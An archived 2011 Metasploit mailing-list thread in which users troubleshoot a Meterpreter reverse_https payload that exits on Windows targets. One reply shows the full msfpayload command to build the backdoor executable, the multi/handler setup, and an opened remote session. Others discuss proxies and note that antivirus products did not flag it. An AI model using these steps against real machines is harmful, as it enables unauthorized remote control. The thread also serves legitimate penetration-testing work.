Metasploit mailing list archives
Re: Meterpreter Reverse_HTTPS dies
From: c0lists <lists () carnal0wnage com>
Date: Thu, 3 Mar 2011 11:23:04 -0500
make sure your LPORT is right, by default reverse_https connects to 8443. i just tested with current svn and it worked. chris@carnal0wnage:~/trunk$ ./msfpayload windows/meterpreter/reverse_https LHOST =y.y.y.y X>demohttps.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_https Length: 369 Options: LHOST=y.y.y.y chris@carnal0wnage:~/trunk$ file demohttps.exe demohttps.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit chris@carnal0wnage:~/trunk$ ./msfconsole =[ metasploit v3.6.0-beta [core:3.6 api:1.0] + -- --=[ 647 exploits - 342 auxiliary + -- --=[ 257 payloads - 27 encoders - 8 nops =[ svn r11870 updated today (2011.03.03) msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https PAYLOAD => windows/meterpreter/reverse_https msf exploit(handler) > set LHOST y.y.y.y LHOST => y.y.y.y msf exploit(handler) > set LPORT 8443 LPORT => 8443 msf exploit(handler) > exploit [*] Started HTTPS reverse handler on https://y.y.y.y:8443/ [*] Starting the payload handler... [*] x.x.x.x:23735 Request received for /AyCku... [*] x.x.x.x:23735 Staging connection for target yCku received... [*] Patching Target ID yCku into DLL [*] x.x.x.x:23736 Request received for /ByCku... [*] x.x.x.x:23736 Stage connection for target yCku received... [*] Meterpreter session 1 opened (y.y.y.y:8443 -> x.x.x.x:23736) at Thu Mar 03 16:17:48 +0000 2011 meterpreter > sysinfo Computer : COMPUTER OS : Windows XP (Build 2600, Service Pack 3). Arch : x86 Language : en_US Meterpreter: x86/win32 meterpreter > On Thu, Mar 3, 2011 at 4:00 AM, JOhn Mistikopoulos <mailtest1223133456 () gmail com> wrote:
I have tried numerous scenarios such as: 1. Middle proxy servers (more than 3 different web proxy software) 2. A single proxy server 3. No proxy server 4. Over the internet and locally (get the same error) 5. Tested with different service packs (WinXP SP1, SP3, Win7) 6. Tested with IE6, unpatched. 7. Tested with different user accounts and group policies. 8. Tested in Symantec and McAfee Endpoint protection (none marked it as a threat) 9. Tested without any AV protection or Firewall-IPS. When I run the payload (for example the "exe" file in an unprotected PC - no AV, no IPS) I got the its name on the task manager just for a while and then dies. HoweverI don't see any instance of iexplorer.exe running. On Wed, Mar 2, 2011 at 5:35 PM, HD Moore <hdm () metasploit com> wrote:On 2/28/2011 6:13 AM, JOhn Mistikopoulos wrote:And then, the listener stops giving any other info. I went to the victim PC and realized that the payload exe had already dies. I couldn't see it on the task manager. Concurrently, I had been running wireshark. The two last packets were: 1. Victim => Listener (RST, ACK) 2. Listener => Victim (FIN, ACK) Finally I don't get any connections. Does anyone know how to fix this?Is there any network proxy/filter between the target and yourself? Is the target running an endpoint protection product or HIPS? Is the target process a user-process (IE) or a system process (assuming IE/user-land)? The reverse_https payload is finicky based on the WinInet profile of the user running the code. -HD _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Feb 28)
- Re: Meterpreter Reverse_HTTPS dies HD Moore (Mar 02)
- Re: Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Mar 03)
- Re: Meterpreter Reverse_HTTPS dies Rob Fuller (Mar 03)
- Re: Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Mar 04)
- Re: Meterpreter Reverse_HTTPS dies Rob Fuller (Mar 04)
- Re: Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Mar 09)
- Re: Meterpreter Reverse_HTTPS dies Gerasimos Kassaras (Mar 09)
- Re: Meterpreter Reverse_HTTPS dies ricky-lee birtles (Mar 09)
- Re: Meterpreter Reverse_HTTPS dies Jerry (Mar 09)
- Re: Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Mar 03)
- Re: Meterpreter Reverse_HTTPS dies HD Moore (Mar 02)
- Re: Meterpreter Reverse_HTTPS dies c0lists (Mar 03)